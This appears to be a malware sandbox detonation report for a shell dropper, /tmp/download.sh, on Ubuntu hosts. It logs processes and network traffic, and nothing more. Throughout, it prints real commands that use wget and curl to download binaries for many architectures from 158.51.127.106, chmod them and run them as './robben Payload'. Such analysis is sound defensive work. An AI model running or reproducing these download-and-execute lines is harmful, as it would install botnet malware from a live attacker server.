[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x config-err-DncUPG download.sh robben snap-private-tmp ssh-R1FguAXtDwge systemd-private-b0e593c6607f42e8a0803a07ba0eb743-colord.service-VArqDg systemd-private-b0e593c6607f42e8a0803a07ba0eb743-ModemManager.service-oAnasi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-switcheroo-control.service-Il0Ssj systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-logind.service-YJkB0f systemd-private-b0e593c6607f42e8a0803a07ba0eb743-systemd-resolved.service-KGrVXi systemd-private-b0e593c6607f42e8a0803a07ba0eb743-upower.service-Pc7AYh]

/tmp/robben

[./robben Payload]

Network

Country  Destination         Domain                          Proto
N/A      224.0.0.251:5353                                    udp
US       158.51.127.106:80                                   tcp
US       1.1.1.1:53          connectivity-check.ubuntu.com   udp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       158.51.127.106:80                                   tcp
US       1.1.1.1:53          connectivity-check.ubuntu.com   udp
US       1.1.1.1:53          connectivity-check.ubuntu.com   udp
US       91.189.91.49:80     connectivity-check.ubuntu.com   tcp
US       1.1.1.1:53          connectivity-check.ubuntu.com   udp
US       1.1.1.1:53          connectivity-check.ubuntu.com   udp
US       91.189.91.48:80     connectivity-check.ubuntu.com   tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:57

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

95s

Max time network

387s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-timedated.service-C6yiE2 systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-timedated.service-C6yiE2 systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-n2WIav robben snap-private-tmp systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp (22 occurrences)

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:57

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

92s

Max time network

590s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A (11 occurrences)

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A (11 occurrences)

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-timedated.service-sYHQTy systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp (22 occurrences)
US 8.8.8.8:53 api.snapcraft.io udp (15 occurrences)
GB 185.125.188.58:443 api.snapcraft.io tcp
GB 185.125.188.59:443 api.snapcraft.io tcp (3 occurrences)
GB 185.125.188.55:443 api.snapcraft.io tcp (6 occurrences)
US 8.8.8.8:53 canonical-bos01.cdn.snapcraftcontent.com udp (4 occurrences)
US 91.189.91.43:443 canonical-bos01.cdn.snapcraftcontent.com tcp (3 occurrences)
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp (2 occurrences)
